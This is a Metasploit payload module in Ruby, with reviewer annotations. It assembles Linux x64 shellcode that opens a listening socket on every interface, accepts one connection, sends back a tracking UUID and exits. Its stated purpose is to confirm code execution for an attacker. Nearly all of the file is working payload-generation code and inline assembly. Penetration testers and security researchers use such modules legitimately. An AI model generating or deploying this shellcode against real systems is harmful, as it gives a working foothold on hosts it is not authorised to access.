Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


# Linux x64 "pingback" bind-TCP payload. The generated shellcode listens on
# LPORT, accepts a single connection, writes the pingback UUID to it and then
# exits. Nothing beyond the UUID is sent; the session type is Pingback.
module MetasploitModule

  # Size in bytes of the shellcode returned by #generate, as recorded in the
  # framework's payload size cache. Keep in sync with the assembly below: any
  # change to the instructions or to the UUID byte length changes the output.
  CachedSize = 109

  include Msf::Payload::Linux
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the module metadata (name, platform, arch, handler, session type)
  # with the framework.
  #
  # @param info [Hash] extra module info merged into the defaults below
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Linux x64 Pingback, Bind TCP Inline',
      'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
      'Author' => [ 'bwatters-r7' ],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_X64,
      'Handler' => Msf::Handler::BindTcp,
      'Session' => Msf::Sessions::Pingback
    ))
    # NOTE(review): no `end` closes initialize before this `def`, so as written
    # generate is a method definition nested inside initialize and is
    # (re)defined every time initialize runs. It works because initialize always
    # runs first, but the nesting looks unintended — confirm against upstream.

    # Assembles the bind-TCP pingback shellcode.
    #
    # @param opts [Hash] unused here; accepted for interface compatibility with
    #   the other payload modules' generate methods
    # @return [String] raw x86-64 machine code (its length is CachedSize)
    def generate(opts={})
      # Port examples as the bytes appear in memory (network byte order):
      # 22 -> "0x00,0x16"
      # 4444 -> "0x11,0x5c"
      # Build the 32-bit value that, once written little-endian by the
      # `mov rcx, imm64` below, lays out the first half of a sockaddr_in:
      # sin_family = 2 (AF_INET) followed by sin_port in network byte order.
      # "v" packs LPORT little-endian and "n" packs the 2 big-endian; reading
      # the four bytes back with "N" and printing them with "%.8x" is undone
      # again when the immediate is encoded, so the bytes land in place.
      encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
      # Bind address is hard-coded to 0.0.0.0 (INADDR_ANY): the listener is
      # reachable on every interface and no datastore host option is consulted.
      encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
      # 64-bit immediate for `mov rcx`: high dword = address, low dword = family+port.
      encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
      # pingback_uuid / generate_pingback_uuid are provided by the Pingback
      # mixin; presumably the UUID is an even-length hex string, since it is
      # split into two-character groups below — verify against the mixin.
      self.pingback_uuid ||= self.generate_pingback_uuid
      # "0xAA,0xBB,..." for the assembler's `db` directive. The UUID is embedded
      # as literal bytes in the shellcode, so it is recoverable from the payload.
      uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")

      # Shellcode flow: socket -> bind(0.0.0.0:LPORT) -> listen -> accept ->
      # write(UUID) -> exit(1). Only the socket() return value is checked
      # (`js failed`); bind/listen/accept results are not, and after the write
      # execution falls through into `failed:`, so the process exits with
      # status 1 on both paths. The `push 0x1c` before accept is the addrlen
      # value (28) even though the inline comment says 16.
      asm = %Q^
        push rsi
        push rax
        ;SOCKET
        push 0x29
        pop rax
        cdq
        push 0x2
        pop rdi
        push 0x1
        pop rsi
        syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
        test rax, rax
        js failed

        xchg rdi, rax
        mov rcx, #{encoded_host_port}
        push rcx
        mov rsi, rsp
        push rsp
        pop rsi ; store pointer to struct

        bind_call:
        ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
        ; rdi -> fd already stored in rdi
        ; rsi -> pointer to sockaddr_in6 struct already in rsi
        push 0x31
        pop rax ; bind syscall
        push 0x10 ; sockaddr length
        pop rdx ;
        syscall

        listen_call:
        ; int listen(int sockfd, int backlog);
        ; rdi -> fd already stored in rdi
        push 0x32
        pop rax ; listen syscall
        push 0x1
        pop rsi ; backlog
        syscall

        accept_call:
        ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
        ; rdi -> fd already stored in rdi
        push 0x2b
        pop rax ; accept syscall
        cdq ; zero-out rdx via sign-extension
        push rdx
        push rdx
        push rsp
        pop rsi ; when populated, client will be stored in rsi
        push 0x1c
        lea rdx, [rsp] ; pointer to length of rsi (16)
        syscall
        xchg rdi, rax ; grab client fd
        send_pingback:
        ; sys_write(fd:rdi, buf*:rsi, length:rdx)
        push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
        pop rdx ; length in rdx
        call get_uuid_address ; put uuid buffer on the stack
        db #{uuid_as_db} ; PINGBACK_UUID
        get_uuid_address:
        pop rsi ; UUID address into rsi
        xor rax, rax ; sys_write = offset 1
        inc rax ; sys_write = offset 1
        syscall ; call sys_write

        failed:
        push 0x3c
        pop rax
        push 0x1
        pop rdi
        syscall ; exit(1)
      ^
      # Assemble with Metasm and return the raw bytes.
      Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
    end
  end
end
